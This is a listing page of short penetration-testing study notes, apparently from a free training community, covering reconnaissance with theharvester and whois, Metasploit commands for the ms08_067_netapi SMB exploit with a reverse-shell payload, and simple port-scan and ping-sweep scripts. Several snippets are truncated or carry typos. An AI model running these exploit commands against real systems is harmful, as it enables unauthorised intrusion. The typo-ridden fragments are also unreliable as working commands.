Advanced Penetration Testing Notes

Targeting and Email and Maltego

# theharvester -d cisco.com -l 500 -b all www.netcraft.com #maltego shodahq.com [view]

By: NKPoonia | Related Lesson: Information Gathering (part 3) Targeting Email and Maltego | Modified: November 1, 2016

Information Gathering

Open Source Intelligance Gathering: # whois bulbsecurity.com # whois gorgeiaweidman.com # www.bulbsecurity.com  # nslookup www.bulbsecurity.com  # nslookup  > set type=mx  > bulbsecurity.com >exit  #nsloopup > set type=mc > cisco. [view]

By: NKPoonia | Related Lesson: Information Gathering (part 2) Domain Name Services | Modified: November 1, 2016

MSF

1 # msfcli -h      // Metasploit condole line interface  2  # msfcli exploit/windown/smb/ms08_067_netapi P 3   # msfcli exploit/windown/smb/ms08_067_netapi payload = windows/shell/reverse_tcp O 4  # msfcli exploit/windown/smb/ms08_067_netapi p [view]

By: NKPoonia | Related Lesson: Metasploit (part 5) msfcli | Modified: October 31, 2016

Auxiliary Module

msf exploit (ms08_067_netapi) > show options  msf exploit (ms08_067_netapi) > use auxilary/scanner/smb/pipe_auditor msf exploit (ms08_067_netapi) > set RHOSTS 192.168.1.1  msf exploit (ms08_067_netapi) > exploit    [view]

By: NKPoonia | Related Lesson: Metasploit (part 4) Auxiliary Module | Modified: October 31, 2016

Metasploit Console

#msfupdate                            // It will Update Metasploit #service postgresql start     // Start Database Service #service metasploit start  #msfconsole  msf > help msf > msf  route msf exploit (ms08_067_netapi) > [view]

By: NKPoonia | Related Lesson: Metasploit (part 3) Operation | Modified: October 31, 2016

help

hi   [view]

By: matrix2017 | Related Lesson: Linux (part 2) Kali Linux Commands | Modified: October 31, 2016

Metasploit

#cd /usr/share/metasploit-framework #cd modules/ #ls  #cd window/ #cd smb  #ls  www.exploit-db.com   [view]

By: NKPoonia | Related Lesson: Metasploit (part 2) Fundamentals | Modified: October 29, 2016

C Programming

#include <stdio.h> int main(int argc, char ’argv[]) {                    if (argc < 2)                   {                   printf(”%s\n” , -Pass your name as an argument”) ; else { printf [view]

By: NKPoonia | Related Lesson: Programming (part 5) Python Import Command | Modified: October 29, 2016

Python For Port Scanning

#nano python.py #which python  #nano python.py   python interpreter  { #!/usr/bin/python  import socket  ip = raw_input(”Enter the IP address: ” ) port = input(”Enter port Number : ”) sock = socket.socket(socket.AF_INET, [view]

By: NKPoonia | Related Lesson: Programming (part 4) Python for Port Scanning | Modified: October 29, 2016

Network Ping

Network Ping Script in Nano Editor  { #!/bin/bash if[ ”$1” == ”” ] then  echo ”Usage: ./ping.sh[network]” echo ”Example: ./ping.sh 192.168.1” else  for x in seq 1 254 ; do  ping -c 1 $1.$x  | grep [view]

By: NKPoonia | Related Lesson: Programming (part 3) Network Pings | Modified: October 29, 2016

« First ‹ Previous 1 105 195 203 204 205 206 207 215 243 Next › Last »

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge

 

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel